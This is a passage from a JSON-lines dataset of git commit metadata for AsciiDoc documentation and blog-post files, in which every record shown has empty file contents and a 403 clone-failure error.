VH\/Arduino,henningpohl\/Arduino,andyvand\/Arduino-1,me-no-dev\/Arduino-1,gurbrinder\/Arduino,laylthe\/Arduino,ssvs111\/Arduino,wayoda\/Arduino,sanyaade-iot\/Arduino-1,wdoganowski\/Arduino,NicoHood\/Arduino,jaimemaretoli\/Arduino,lulufei\/Arduino,shiitakeo\/Arduino,eduardocasarin\/Arduino,PeterVH\/Arduino,arduino-org\/Arduino,spapadim\/Arduino,danielchalef\/Arduino,PeterVH\/Arduino,talhaburak\/Arduino,plinioseniore\/Arduino,mateuszdw\/Arduino,vbextreme\/Arduino,myrtleTree33\/Arduino,smily77\/Arduino,fungxu\/Arduino,pdNor\/Arduino,xxxajk\/Arduino-1,ForestNymph\/Arduino_sources,lulufei\/Arduino,nkolban\/Arduino,KlaasDeNys\/Arduino,damellis\/Arduino,wayoda\/Arduino,karlitxo\/Arduino,niggor\/Arduino_cc,mboufos\/esp8266-Arduino,niggor\/Arduino_cc,radut\/Arduino,benwolfe\/esp8266-Arduino,ashwin713\/Arduino,mattvenn\/Arduino,plaintea\/esp8266-Arduino,wayoda\/Arduino,steamboating\/Arduino,tannewt\/Arduino,adafruit\/ESP8266-Arduino,sanyaade-iot\/Arduino-1,jmgonzalez00449\/Arduino,radut\/Arduino,jamesrob4\/Arduino,zederson\/Arduino,tannewt\/Arduino,acosinwork\/Arduino,ektor5\/Arduino,Chris--A\/Arduino,HCastano\/Arduino,me-no-dev\/Arduino-1,jaehong\/Xmegaduino,adafruit\/ESP8266-Arduino,NaSymbol\/Arduino,ntruchsess\/Arduino-1,Cloudino\/Cloudino-Arduino-IDE,ccoenen\/Arduino,onovy\/Arduino,henningpohl\/Arduino,cscenter\/Arduino,stevemarple\/Arduino-org,arunkuttiyara\/Arduino,probonopd\/Arduino,scdls\/Arduino,probonopd\/Arduino,mangelajo\/Arduino,nkolban\/Arduino,HCastano\/Arduino,pdNor\/Arduino,eggfly\/arduino,gonium\/Arduino,zederson\/Arduino,piersoft\/esp8266-Arduino,radut\/Arduino,eeijcea\/Arduino-1,ssvs111\/Arduino,ogahara\/Arduino,arduino-org\/Arduino,smily77\/Arduino,ccoenen\/Arduino,NeuralSpaz\/Arduino,jabezGit\/Arduino,stickbreaker\/Arduino,nandojve\/Arduino,plaintea\/esp8266-Arduino,leftbrainstrain\/Arduino-ESP8266,myrtleTree33\/Arduino,weera00\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,jomolinare\/Arduino,andrealmeidadomingues\/Arduino,Cloudino\/Cloudino-Arduino-IDE,ikbelkirasan\/Arduino,mboufos\/esp8266-Arduino,eeijcea\/Arduino-1,steamboating\/Arduino,pdNor\/Arduino,bsmr-arduino\/Arduino,adafruit\/ESP8266-Arduino,jmgonzalez00449\/Arduino,snargledorf\/Arduino,Cloudino\/Arduino,fungxu\/Arduino,tbowmo\/Arduino,paulmand3l\/Arduino,stevemayhew\/Arduino,zaiexx\/Arduino,wilhelmryan\/Arduino,stevemarple\/Arduino-org,ogferreiro\/Arduino,jaimemaretoli\/Arduino,gestrem\/Arduino,Gourav2906\/Arduino,UDOOboard\/Arduino,kidswong999\/Arduino,KlaasDeNys\/Arduino,piersoft\/esp8266-Arduino,zederson\/Arduino,snargledorf\/Arduino,spapadim\/Arduino,byran\/Arduino,zenmanenergy\/Arduino,tannewt\/Arduino,wayoda\/Arduino,koltegirish\/Arduino,jabezGit\/Arduino,cscenter\/Arduino,probonopd\/Arduino,shannonshsu\/Arduino,plinioseniore\/Arduino,raimohanska\/Arduino,jmgonzalez00449\/Arduino,ricklon\/Arduino,HCastano\/Arduino,me-no-dev\/Arduino-1,Gourav2906\/Arduino,koltegirish\/Arduino,jomolinare\/Arduino,garci66\/Arduino,gberl001\/Arduino,onovy\/Arduino,bsmr-arduino\/Arduino,jamesrob4\/Arduino,chaveiro\/Arduino,damellis\/Arduino,wdoganowski\/Arduino,Cloudino\/Cloudino-Arduino-IDE,aichi\/Arduino-2,jaehong\/Xmegaduino,karlitxo\/Arduino,eeijcea\/Arduino-1,tbowmo\/Arduino,eggfly\/arduino,shannonshsu\/Arduino,eduardocasarin\/Arduino,tbowmo\/Arduino,ssvs111\/Arduino,ForestNymph\/Arduino_sources,vbextreme\/Arduino,tomkrus007\/Arduino,ogahara\/Arduino,lulufei\/Arduino,ashwin713\/Arduino,mattvenn\/Arduino,eddyst\/Arduino-SourceCode,shiitakeo\/Arduino,adamkh\/Arduino,leftbrainstrain\/Arduino-ESP8266,benwolfe\/esp8266-Arduino,zaiexx\/Arduino,bigjosh\/Arduino,wilhelmryan\/Arduino,eeijcea\/Arduino-1,jomolinare\/Arduino,drpjk\/Arduino,jaej-dev\/Arduino,henningpohl\/Arduino,ntruchsess\/Arduino-1,majenkotech\/Arduino,acosinwork\/Arduino,chaveiro\/Arduino,snargledorf\/Arduino,tbowmo\/Arduino,gurbrinder\/Arduino,wilhelmryan\/Arduino,vbextreme\/Arduino,jaimemaretoli\/Arduino,ccoenen\/Arduino,zaiexx\/Arduino,ari-analytics\/Arduino,shiitakeo\/Arduino,niggor\/Arduino_cc,jaej-dev\/Arduino,bigjosh\/Arduino,jaimemaretoli\/Arduino,kidswong999\/Arduino,leftbrainstrain\/Arduino-ESP8266,smily77\/Arduino","old_file":"build\/shared\/manpage.adoc","new_file":"build\/shared\/manpage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenDevice\/Arduino.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"de273651aef19be1dd8e5490fa059beca08a1759","subject":"[DOCS] Fix broken link in painless example","message":"[DOCS] Fix broken link in painless example\n","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/painless\/painless-getting-started.asciidoc","new_file":"docs\/painless\/painless-getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5dc9e87bad4b81a3afa99e4e5b36ce3a29f9a811","subject":"[DOCS] Fixes broken link in auditing settings","message":"[DOCS] Fixes broken link in auditing settings\n","repos":"uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8fe06fb96d2031e7ee16cdd2c65a2f697e2549a6","subject":"[DOCS] Add missing backslash","message":"[DOCS] Add missing backslash\n\nThis commit adds a missing backslash for the Azure CLI 2.0 example code","repos":"elastic\/azure-marketplace,elastic\/azure-marketplace","old_file":"docs\/azure-arm-template.asciidoc","new_file":"docs\/azure-arm-template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/azure-marketplace.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51fce11a7711e6049b1328eb4634d0aa0d802b36","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3c349e4212e423936191c16eeef56a41865acf","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdebfdc262f83483eed815bed054ce5410e46e09","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a5fae043197d1136d1d00194107c9e3f7457f8","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e25f189fc2df706a2672913b98ac401218362e71","subject":"[TEST] Added TESTING.asciidoc with some info on testing","message":"[TEST] Added TESTING.asciidoc with some info on testing\n\nThe goal of TESTING.asciidoc is not to repeat what's already in the elasticsearch core test cheatsheet, but only add what is different in shield.\n\nOriginal commit: elastic\/x-pack-elasticsearch@51ad3894d2cfc41291a2ab5720022aa42bd31860\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"161b0bc660b97c3eb277e4882c71ff476eddb253","subject":"Publish 2016-12-2-3-Dpen.adoc","message":"Publish 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eeb96dd0083c4c65f13ef8798b0e48d7a85238","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3%20Unique%20Gadgets%20You%20Wouldn't%20Expect%20To%20Exist.adoc","new_file":"_posts\/2018-02-23-3%20Unique%20Gadgets%20You%20Wouldn't%20Expect%20To%20Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47eaf5dec45c384683beb0a599b4b12cda417d11","subject":"Delete the file at '_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","message":"Delete the file at '_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d57cb0eb0d29ef7b34f0c68f81ccc0e22284467","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915dae2119f47e488bff1dc65ceda17fea814c3","subject":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","message":"Update 2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_file":"_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21a0c8a78428fc7b28bb96025031d78159c66f47","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"982f2e69a100d8ac4242501cc6441f87843bf14d","subject":"Update 2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","message":"Update 2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","new_file":"_posts\/2016-03-29-Microservices-in-the-Chronicle-world-Part-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e3db9ad71e6982737ed35cba2a9b3247e282e7","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8959b7863a1454c6f19ccb5319ad9abbc2ed786","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f089482090d23226ddb19939d38603d380c778dc","subject":"Update 2016-11-21-Fresh-Start.adoc","message":"Update 2016-11-21-Fresh-Start.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df640d7a79e92ac9e41d72a6fb8563ebd1ac837d","subject":"Update 2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2012-01-01-Lobby-GitHub-for-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f2587cdb36578acef8dd313981f18ba74ab747","subject":"Added more docs about the demo; fixes #67","message":"Added more docs about the demo; fixes #67\n","repos":"wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"docs\/DEMO.adoc","new_file":"docs\/DEMO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02f36f28c114e0d8db29c20240157dea4e26e8d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d44fb6b5299c93f23b8629e3507f5413d29465d7","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80a30e1513a9614622e08657b94dca56db9e250f","subject":"doc: userguide: expand crypto documentation to cover random apis","message":"doc: userguide: expand crypto documentation to cover random apis\n\nClean up the crypto section of the User Guide and expand on the\nODP random data APIs.\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Petri Savolainen <d528fd253b9aaf78fa72edbcc6249e82047f6ce6@nokia.com>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-crypto.adoc","new_file":"doc\/users-guide\/users-guide-crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8312888fc281ae4abfac753676864a2f49b38254","subject":"Update 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Update 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"_posts\/2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7211dbc255d95e6e54f191120690fa031e0fa83","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8523e779cc10d1beb39b8f6d57c116406af505","subject":"schema: updated docs","message":"schema: updated docs\n","repos":"pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b5a095e12dc76f61570868a926bab22f8d5863","subject":"Update 2011-11-21-Transient.adoc","message":"Update 2011-11-21-Transient.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2011-11-21-Transient.adoc","new_file":"_posts\/2011-11-21-Transient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dac3bd92df8308bdcf2aab217554ff47c369852","subject":"Update 2016-12-14-Viagem-no-Tempo.adoc","message":"Update 